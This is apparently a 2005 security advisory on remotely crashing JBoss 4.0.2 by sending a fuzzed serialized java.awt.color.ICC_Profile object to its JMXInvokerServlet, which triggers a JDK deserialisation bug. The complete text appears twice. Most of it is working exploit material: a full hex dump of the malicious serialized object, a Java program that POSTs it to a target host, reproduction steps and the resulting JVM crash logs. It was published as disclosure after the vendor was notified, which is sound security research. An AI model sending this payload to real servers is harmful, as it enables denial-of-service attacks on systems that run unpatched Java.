Marc Schoenefeld
04/11/05, 20:15
=+================================================ =============
Remotely DoSing JBoss 4.0.2 with serialized java objects
Implications of serialisation vulnerabilies in JDK
=+================================================ =============
Author: Marc Schoenefeld , illegalaccess.org
marc/at/illegalaccess.org
=+================================================ =============
Date: November 4, 2005
=+================================================ =============
As I had the chance to demonstrate on HackInTheBox 2005
the JDK 1.4.2 was vulnerable to a font deserialization bug. This can be
used to crash the default installation of every version
of JBoss application on Win32, up to the current 4.0.2 version.
JBoss offers the possibility of invoking JMX methods
with the URL:
http://host:8080/invoker/JMXInvokerServlet
I fuzzed several values in the GRAY.pf font file, and
created a serialized font object from it. The resulting
file can be found in [Appendix:1]. Then I wrote a small program
[Appendix:2] that POSTs the object via HTTP to the
/invoker/JMXInvokerServlet.
The following deserialisation call crashes the underlying JDK [Appendix:3].
To reconstruct run
1) a JBoss server in the default installation
2) un-xxd the file iccprofile.ser.xxd to iccprofile.ser
3) Run InvokerUpload.java [Appendix:2] with two arguments, like
java InvokerUpload 127.0.0.1 iccprofile.ser
There are several other vulnerable object types that
can be triggered that way from remote like several
classes from rt.jar that expose this bug also in
1.4.2_09 and 1.5.0_05, as shown in [Appendix:4] and
[Appendix:5]. Even worse these bugs crash the JVM
on all platforms (WOCE, write once crash everyhere).
Sun is aware of this particular bug since 7/17/05.
In order to finally support the safe release of a fix
and an official advisory from Sun I rewill not disclose
the serialized vulnerable version of the affected
java.lang.* classes until the release of a fix.
After my bug report Sun announced fixes in 5.0U6,
1.4.2_11 and 1.3.1_17.
It shall be noted that there is no vulnerability problem
with JBoss itself, as this is a flaw in the JDK only.
Problems in the java serialisation API are not new, see
http://sunsolve.sun.com/search/document.do?assetkey=1-26-57707-1
JBoss is used only for demonstration purposes to show a
good product may suffer from vulnerabilities in the layer
below. Therefore every architecture that uses the serialisation
API is potentially affected.
Sincerely
Marc Schönefeld
=+================================================ =============
[Appendix:1] iccprofile.ser.xxd
0000000: aced 0005 7372 001e 6a61 7661 2e61 7774 ....sr..java.awt
0000010: 2e63 6f6c 6f72 2e49 4343 5f50 726f 6669 .color.ICC_Profi
0000020: 6c65 4772 6179 f064 2ff1 f299 a2a7 0200 leGray.d/.......
0000030: 0078 7200 1a6a 6176 612e 6177 742e 636f .xr..java.awt.co
0000040: 6c6f 722e 4943 435f 5072 6f66 696c 65c9 lor.ICC_Profile.
0000050: 5794 b0cf c9ef 4203 0001 4900 1f69 6363 W.....B...I..icc
0000060: 5072 6f66 696c 6553 6572 6961 6c69 7a65 ProfileSerialize
0000070: 6444 6174 6156 6572 7369 6f6e 7870 0000 dDataVersionxp..
0000080: 0001 7075 7200 025b 42ac f317 f806 0854 ..pur..[B......T
0000090: e002 0000 7870 0000 0000 0000 0278 4b43 ....xp.......xKC
00000a0: 4d53 0200 0000 6d6e 7472 4752 4159 5859 MS....mntrGRAYXY
00000b0: 5a20 005f 0007 001b 0011 001e 000f 6163 Z ._..........ac
00000c0: 7370 5355 4e57 0000 0001 4b4f 4441 4752 spSUNW....KODAGR
00000d0: 4159 0000 0000 0000 0000 0000 0001 0000 AY..............
00000e0: f6d5 0001 0000 0000 d32b 0000 0000 0000 .........+......
00000f0: 0000 0000 0000 0000 0000 0000 0000 0000 ................
0000100: 0000 0000 0000 0000 0000 0000 0000 0000 ................
0000110: 0000 0000 0000 0000 0000 0000 0006 6370 ..............cp
0000120: 7274 0000 00cc 0000 003f 6465 7363 0000 rt.......?desc..
0000130: 010c 0000 0081 646d 6e64 0000 0190 0000 ......dmnd......
0000140: 0060 7774 7074 0000 01f0 0000 0014 6b54 .`wtpt........kT
0000150: 5243 0000 0204 0000 000e 646d 6464 0000 RC........dmdd..
0000160: 0214 0000 0064 7465 7874 0000 0000 434f .....dtext....CO
0000170: 5059 5249 4748 5420 2863 2920 3139 3937 PYRIGHT (c) 1997
0000180: 2045 6173 746d 616e 204b 6f64 616b 2c20 Eastman Kodak,
0000190: 416c 6c20 7269 6768 7473 2072 6573 6572 All rights reser
00001a0: 7665 642e 0000 6465 7363 0000 0000 0000 ved...desc......
00001b0: 0027 4b4f 4441 4b20 4772 6179 7363 616c .'KODAK Grayscal
00001c0: 6520 436f 6e76 6572 7369 6f6e 202d 2047 e Conversion - G
00001d0: 616d 6d61 2031 2e30 0000 0000 0000 0000 amma 1.0........
00001e0: 0000 0000 0000 0000 00d8 b240 0000 0000 ...........@....
00001f0: 00ff ffff ff11 0100 00c4 087e 0000 0000 ...........~....
0000200: 0000 0000 0000 0000 0000 0000 0000 0000 ................
0000210: 00c4 087e 0000 0000 00c4 087e 000c 0000 ...~.......~....
0000220: 0001 0000 0000 0000 0000 6465 7363 0000 ..........desc..
0000230: 0000 0000 0006 4b4f 4441 4b00 0000 0000 ......KODAK.....
0000240: 0000 0000 0000 0000 0000 0000 d8b2 4000 ..............@.
0000250: 0000 0000 ffff ffff 0809 8a00 e008 8a00 ................
0000260: 0000 0000 0000 0000 0000 0000 0000 0000 ................
0000270: 0000 0000 e008 8a00 0000 0000 e008 8a00 ................
0000280: d82c 8a00 d82c 8a00 0000 5859 5a20 0000 .,...,....XYZ ..
0000290: 0000 0000 f6d5 0001 0000 0000 d32b 6375 .............+cu
00002a0: 7276 0000 0000 0000 0001 0100 0000 6465 rv............de
00002b0: 7363 0000 0000 0000 000a 4772 6179 7363 sc........Graysc
00002c0: 616c 6500 0000 0000 0000 0000 0000 0000 ale.............
00002d0: 0000 0000 d8b2 4000 0000 0000 ffff ffff ......@.........
00002e0: 0809 8a00 e008 8a00 0000 0000 0000 0000 ................
00002f0: 0000 0000 0000 0000 0000 0000 e008 8a00 ................
0000300: 0000 0000 e008 8a00 d82c 8a00 d82c 8a00 .........,...,..
0000310: 0000 78 ..x
=+================================================ =============
[Appendix:2]: InvokerUpload.java
import java.io.BufferedReader;
import java.io.ByteArrayInputStream;
import java.io.FileInputStream;
import java.io.InputStreamReader;
import java.io.ObjectInputStream;
import java.io.PrintWriter;
import java.net.HttpURLConnection;
import java.net.URL;
public class InvokerUpload {
public static void main(String[] a) throws Exception {
URL url = new URL ("http://"+a[0]+":8080/invoker/JMXInvokerServlet");
FileInputStream fis = new FileInputStream(a[1]);
byte[] b = new byte[fis.available()];
fis.read(b);
System.out.println(fis.available());
HttpURLConnection con =
(HttpURLConnection)url.openConnection();
con.setDoOutput(true);
con.connect();
con.getOutputStream().write(b);
con.getOutputStream().close();
BufferedReader br = new BufferedReader(new
InputStreamReader(con.getInputStream()));
String res = br.readLine();
System.out.println(res);
ByteArrayInputStream bis = new ByteArrayInputStream(b);
ObjectInputStream ois = new ObjectInputStream(bis);
Object o = ois.readObject();
}
}
=+================================================ =============
[Appendix:3] Crash of JBoss 4.0.2 with JDK 1.4.2_08 , font object
23:36:11,359 INFO [Server] JBoss (MX MicroKernel) [4.0.2 (build:
CVSTag=JBoss_4_0_2 date=200505022023)] Started in 13s:359ms
An unexpected exception has been detected in native code outside the VM.
Unexpected Signal : EXCEPTION_ACCESS_VIOLATION (0xc0000005) occurred at
PC=0x46F8155
Function=[Unknown.]
Library=C:\java\1.4.2\08\jre\bin\cmm.dll
NOTE: We are unable to locate the function name symbol for the error
just occurred. Please refer to release documentation for possible
reason and solutions.
Current Java thread:
at sun.awt.color.CMM.cmmLoadProfile(Native Method)
at java.awt.color.ICC_Profile.getInstance(ICC_Profile .java:706)
at java.awt.color.ICC_Profile.readObject(ICC_Profile. java:1912)
[..]
=+================================================ =============
[Appendix:4] Crash of JBoss 4.0.2 with JDK 1.4.2_09 , vulnerable other
rt.jar class
23:27:04,059 INFO [Server] JBoss (MX MicroKernel) [4.0.2 (build:
CVSTag=JBoss_4_0_2 date=200505022023)] Started in 13s:82ms
#
# An unexpected error has been detected by HotSpot Virtual Machine:
#
# EXCEPTION_ACCESS_VIOLATION (0xc0000005) at pc=0x080599b6,
pid=2664,tid=2708
#
# Java VM: Java HotSpot(TM) Client VM (1.4.2_09-b05 mixed mode)
# Problematic frame:
# V [jvm.dll+0x599b6]
#
# An error report file with more information is saved as hs_err_pid2664.log
#
# If you would like to submit a bug report, please visit:
# http://java.sun.com/webapps/bugreport/crash.jsp
#
Drücken Sie eine beliebige Taste . . .
C:\Programme\jboss-4.0.2\bin>
=+================================================ =============
[Appendix:5] Crash of JBoss 4.0.2 with JDK 1.5.0_05 , vulnerable other
rt.jar class
23:50:41,040 INFO [Server] JBoss (MX MicroKernel) [4.0.2 (build:
CVSTag=JBoss_4_0_2 date=200505022023)] Started in 15s:773ms
#
# An unexpected error has been detected by HotSpot Virtual Machine:
#
# EXCEPTION_ACCESS_VIOLATION (0xc0000005) at pc=0x6d6fcc05, pid=792,
tid=1896
#
# Java VM: Java HotSpot(TM) Client VM (1.5.0_05-b05 mixed mode)
# Problematic frame:
# V [jvm.dll+0x4cc05]
#
# An error report file with more information is saved as hs_err_pid792.log
#
# If you would like to submit a bug report, please visit:
# http://java.sun.com/webapps/bugreport/crash.jsp
#
=+================================================ =============
Remotely DoSing JBoss 4.0.2 with serialized java objects
Implications of serialisation vulnerabilies in JDK
=+================================================ =============
Author: Marc Schoenefeld , illegalaccess.org
marc/at/illegalaccess.org
=+================================================ =============
Date: November 4, 2005
=+================================================ =============
As I had the chance to demonstrate on HackInTheBox 2005
the JDK 1.4.2 was vulnerable to a font deserialization bug. This can be
used to crash the default installation of every version
of JBoss application on Win32, up to the current 4.0.2 version.
JBoss offers the possibility of invoking JMX methods
with the URL:
http://host:8080/invoker/JMXInvokerServlet
I fuzzed several values in the GRAY.pf font file, and
created a serialized font object from it. The resulting
file can be found in [Appendix:1]. Then I wrote a small program
[Appendix:2] that POSTs the object via HTTP to the
/invoker/JMXInvokerServlet.
The following deserialisation call crashes the underlying JDK [Appendix:3].
To reconstruct run
1) a JBoss server in the default installation
2) un-xxd the file iccprofile.ser.xxd to iccprofile.ser
3) Run InvokerUpload.java [Appendix:2] with two arguments, like
java InvokerUpload 127.0.0.1 iccprofile.ser
There are several other vulnerable object types that
can be triggered that way from remote like several
classes from rt.jar that expose this bug also in
1.4.2_09 and 1.5.0_05, as shown in [Appendix:4] and
[Appendix:5]. Even worse these bugs crash the JVM
on all platforms (WOCE, write once crash everyhere).
Sun is aware of this particular bug since 7/17/05.
In order to finally support the safe release of a fix
and an official advisory from Sun I rewill not disclose
the serialized vulnerable version of the affected
java.lang.* classes until the release of a fix.
After my bug report Sun announced fixes in 5.0U6,
1.4.2_11 and 1.3.1_17.
It shall be noted that there is no vulnerability problem
with JBoss itself, as this is a flaw in the JDK only.
Problems in the java serialisation API are not new, see
http://sunsolve.sun.com/search/document.do?assetkey=1-26-57707-1
JBoss is used only for demonstration purposes to show a
good product may suffer from vulnerabilities in the layer
below. Therefore every architecture that uses the serialisation
API is potentially affected.
Sincerely
Marc Schönefeld
=+================================================ =============
[Appendix:1] iccprofile.ser.xxd
0000000: aced 0005 7372 001e 6a61 7661 2e61 7774 ....sr..java.awt
0000010: 2e63 6f6c 6f72 2e49 4343 5f50 726f 6669 .color.ICC_Profi
0000020: 6c65 4772 6179 f064 2ff1 f299 a2a7 0200 leGray.d/.......
0000030: 0078 7200 1a6a 6176 612e 6177 742e 636f .xr..java.awt.co
0000040: 6c6f 722e 4943 435f 5072 6f66 696c 65c9 lor.ICC_Profile.
0000050: 5794 b0cf c9ef 4203 0001 4900 1f69 6363 W.....B...I..icc
0000060: 5072 6f66 696c 6553 6572 6961 6c69 7a65 ProfileSerialize
0000070: 6444 6174 6156 6572 7369 6f6e 7870 0000 dDataVersionxp..
0000080: 0001 7075 7200 025b 42ac f317 f806 0854 ..pur..[B......T
0000090: e002 0000 7870 0000 0000 0000 0278 4b43 ....xp.......xKC
00000a0: 4d53 0200 0000 6d6e 7472 4752 4159 5859 MS....mntrGRAYXY
00000b0: 5a20 005f 0007 001b 0011 001e 000f 6163 Z ._..........ac
00000c0: 7370 5355 4e57 0000 0001 4b4f 4441 4752 spSUNW....KODAGR
00000d0: 4159 0000 0000 0000 0000 0000 0001 0000 AY..............
00000e0: f6d5 0001 0000 0000 d32b 0000 0000 0000 .........+......
00000f0: 0000 0000 0000 0000 0000 0000 0000 0000 ................
0000100: 0000 0000 0000 0000 0000 0000 0000 0000 ................
0000110: 0000 0000 0000 0000 0000 0000 0006 6370 ..............cp
0000120: 7274 0000 00cc 0000 003f 6465 7363 0000 rt.......?desc..
0000130: 010c 0000 0081 646d 6e64 0000 0190 0000 ......dmnd......
0000140: 0060 7774 7074 0000 01f0 0000 0014 6b54 .`wtpt........kT
0000150: 5243 0000 0204 0000 000e 646d 6464 0000 RC........dmdd..
0000160: 0214 0000 0064 7465 7874 0000 0000 434f .....dtext....CO
0000170: 5059 5249 4748 5420 2863 2920 3139 3937 PYRIGHT (c) 1997
0000180: 2045 6173 746d 616e 204b 6f64 616b 2c20 Eastman Kodak,
0000190: 416c 6c20 7269 6768 7473 2072 6573 6572 All rights reser
00001a0: 7665 642e 0000 6465 7363 0000 0000 0000 ved...desc......
00001b0: 0027 4b4f 4441 4b20 4772 6179 7363 616c .'KODAK Grayscal
00001c0: 6520 436f 6e76 6572 7369 6f6e 202d 2047 e Conversion - G
00001d0: 616d 6d61 2031 2e30 0000 0000 0000 0000 amma 1.0........
00001e0: 0000 0000 0000 0000 00d8 b240 0000 0000 ...........@....
00001f0: 00ff ffff ff11 0100 00c4 087e 0000 0000 ...........~....
0000200: 0000 0000 0000 0000 0000 0000 0000 0000 ................
0000210: 00c4 087e 0000 0000 00c4 087e 000c 0000 ...~.......~....
0000220: 0001 0000 0000 0000 0000 6465 7363 0000 ..........desc..
0000230: 0000 0000 0006 4b4f 4441 4b00 0000 0000 ......KODAK.....
0000240: 0000 0000 0000 0000 0000 0000 d8b2 4000 ..............@.
0000250: 0000 0000 ffff ffff 0809 8a00 e008 8a00 ................
0000260: 0000 0000 0000 0000 0000 0000 0000 0000 ................
0000270: 0000 0000 e008 8a00 0000 0000 e008 8a00 ................
0000280: d82c 8a00 d82c 8a00 0000 5859 5a20 0000 .,...,....XYZ ..
0000290: 0000 0000 f6d5 0001 0000 0000 d32b 6375 .............+cu
00002a0: 7276 0000 0000 0000 0001 0100 0000 6465 rv............de
00002b0: 7363 0000 0000 0000 000a 4772 6179 7363 sc........Graysc
00002c0: 616c 6500 0000 0000 0000 0000 0000 0000 ale.............
00002d0: 0000 0000 d8b2 4000 0000 0000 ffff ffff ......@.........
00002e0: 0809 8a00 e008 8a00 0000 0000 0000 0000 ................
00002f0: 0000 0000 0000 0000 0000 0000 e008 8a00 ................
0000300: 0000 0000 e008 8a00 d82c 8a00 d82c 8a00 .........,...,..
0000310: 0000 78 ..x
=+================================================ =============
[Appendix:2]: InvokerUpload.java
import java.io.BufferedReader;
import java.io.ByteArrayInputStream;
import java.io.FileInputStream;
import java.io.InputStreamReader;
import java.io.ObjectInputStream;
import java.io.PrintWriter;
import java.net.HttpURLConnection;
import java.net.URL;
public class InvokerUpload {
public static void main(String[] a) throws Exception {
URL url = new URL ("http://"+a[0]+":8080/invoker/JMXInvokerServlet");
FileInputStream fis = new FileInputStream(a[1]);
byte[] b = new byte[fis.available()];
fis.read(b);
System.out.println(fis.available());
HttpURLConnection con =
(HttpURLConnection)url.openConnection();
con.setDoOutput(true);
con.connect();
con.getOutputStream().write(b);
con.getOutputStream().close();
BufferedReader br = new BufferedReader(new
InputStreamReader(con.getInputStream()));
String res = br.readLine();
System.out.println(res);
ByteArrayInputStream bis = new ByteArrayInputStream(b);
ObjectInputStream ois = new ObjectInputStream(bis);
Object o = ois.readObject();
}
}
=+================================================ =============
[Appendix:3] Crash of JBoss 4.0.2 with JDK 1.4.2_08 , font object
23:36:11,359 INFO [Server] JBoss (MX MicroKernel) [4.0.2 (build:
CVSTag=JBoss_4_0_2 date=200505022023)] Started in 13s:359ms
An unexpected exception has been detected in native code outside the VM.
Unexpected Signal : EXCEPTION_ACCESS_VIOLATION (0xc0000005) occurred at
PC=0x46F8155
Function=[Unknown.]
Library=C:\java\1.4.2\08\jre\bin\cmm.dll
NOTE: We are unable to locate the function name symbol for the error
just occurred. Please refer to release documentation for possible
reason and solutions.
Current Java thread:
at sun.awt.color.CMM.cmmLoadProfile(Native Method)
at java.awt.color.ICC_Profile.getInstance(ICC_Profile .java:706)
at java.awt.color.ICC_Profile.readObject(ICC_Profile. java:1912)
[..]
=+================================================ =============
[Appendix:4] Crash of JBoss 4.0.2 with JDK 1.4.2_09 , vulnerable other
rt.jar class
23:27:04,059 INFO [Server] JBoss (MX MicroKernel) [4.0.2 (build:
CVSTag=JBoss_4_0_2 date=200505022023)] Started in 13s:82ms
#
# An unexpected error has been detected by HotSpot Virtual Machine:
#
# EXCEPTION_ACCESS_VIOLATION (0xc0000005) at pc=0x080599b6,
pid=2664,tid=2708
#
# Java VM: Java HotSpot(TM) Client VM (1.4.2_09-b05 mixed mode)
# Problematic frame:
# V [jvm.dll+0x599b6]
#
# An error report file with more information is saved as hs_err_pid2664.log
#
# If you would like to submit a bug report, please visit:
# http://java.sun.com/webapps/bugreport/crash.jsp
#
Drücken Sie eine beliebige Taste . . .
C:\Programme\jboss-4.0.2\bin>
=+================================================ =============
[Appendix:5] Crash of JBoss 4.0.2 with JDK 1.5.0_05 , vulnerable other
rt.jar class
23:50:41,040 INFO [Server] JBoss (MX MicroKernel) [4.0.2 (build:
CVSTag=JBoss_4_0_2 date=200505022023)] Started in 15s:773ms
#
# An unexpected error has been detected by HotSpot Virtual Machine:
#
# EXCEPTION_ACCESS_VIOLATION (0xc0000005) at pc=0x6d6fcc05, pid=792,
tid=1896
#
# Java VM: Java HotSpot(TM) Client VM (1.5.0_05-b05 mixed mode)
# Problematic frame:
# V [jvm.dll+0x4cc05]
#
# An error report file with more information is saved as hs_err_pid792.log
#
# If you would like to submit a bug report, please visit:
# http://java.sun.com/webapps/bugreport/crash.jsp
#
=+================================================ =============